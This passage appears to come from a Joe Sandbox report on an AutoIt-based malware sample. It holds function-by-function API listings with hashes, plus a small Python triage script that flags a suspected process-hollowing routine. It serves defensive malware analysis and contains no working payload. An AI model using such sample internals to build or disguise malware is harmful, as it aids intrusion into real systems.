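  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
"""

if __name__ == "__main__":
    for name, block in [("0x04196000 function", HOLLOWING_BLOCK),
                        ("RegOpenKeyExW function", REGISTRY_BLOCK),
                        ("GetOpenFileNameW function", OPENFILE_BLOCK)]:
        result = triage(block)
        print(name, "->", result["api_id"])
        for label, refs in result["flags"]:
            print("  FLAG:", label, "at", ", ".join(refs))
```

Run as a script it prints the reconstructed API ID for each of the three entries and one FLAG line for the 0x04196000 function, pointing at 041982BB, 04198351 and 04198373. The point of reproducing the API ID rather than just matching names is that it is the same value the report prints under "Similarity", so a hit can be searched for across other reports directly; the stop-word list will need extending for API families that do not appear on this page.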
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: Error:
                                                                          • API String ID: 4104443479-232661952
                                                                          • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                          • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                          APIs
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                          • String ID: X$pWH
                                                                          • API String ID: 85490731-941433119
                                                                          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _memmove.LIBCMT ref: 00401B57
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                          • String ID: @EXITCODE
                                                                          • API String ID: 2734553683-3436989551
                                                                          • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                          • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                          • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1794320848-0
                                                                          • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                          • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentTerminate
                                                                          • String ID:
                                                                          • API String ID: 2429186680-0
                                                                          • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                          • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                          • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                          • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 0043214B
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • _malloc.LIBCMT ref: 0043215D
                                                                          • _malloc.LIBCMT ref: 0043216F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc$AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 680241177-0
                                                                          • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                          • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                          APIs
                                                                            • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                          • _free.LIBCMT ref: 004295A0
                                                                            • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                            • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                            • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                            • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                            • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                            • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                          • API String ID: 3938964917-2806939583
                                                                          • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                          • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                          • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                          • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                          Strings
                                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _strcat
                                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                          • API String ID: 1765576173-2684727018
                                                                          • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                          • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                          APIs
                                                                          • __wsplitpath.LIBCMT ref: 004678F7
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast__wsplitpath_malloc
                                                                          • String ID:
                                                                          • API String ID: 4163294574-0
                                                                          • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                          • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                          • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                          • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                          APIs
                                                                            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                          • _strcat.LIBCMT ref: 0040F786
                                                                            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                          • String ID:
                                                                          • API String ID: 3199840319-0
                                                                          • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                          • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0040D779
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FreeInfoLibraryParametersSystem
                                                                          • String ID:
                                                                          • API String ID: 3403648963-0
                                                                          • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                          • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                          • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                          • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                          • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                          • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                          • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                          APIs
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          • __lock_file.LIBCMT ref: 00414A8D
                                                                            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                          • __fclose_nolock.LIBCMT ref: 00414A98
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                          APIs
                                                                          • __lock_file.LIBCMT ref: 00415012
                                                                          • __ftell_nolock.LIBCMT ref: 0041501F
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2999321469-0
                                                                          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                          APIs
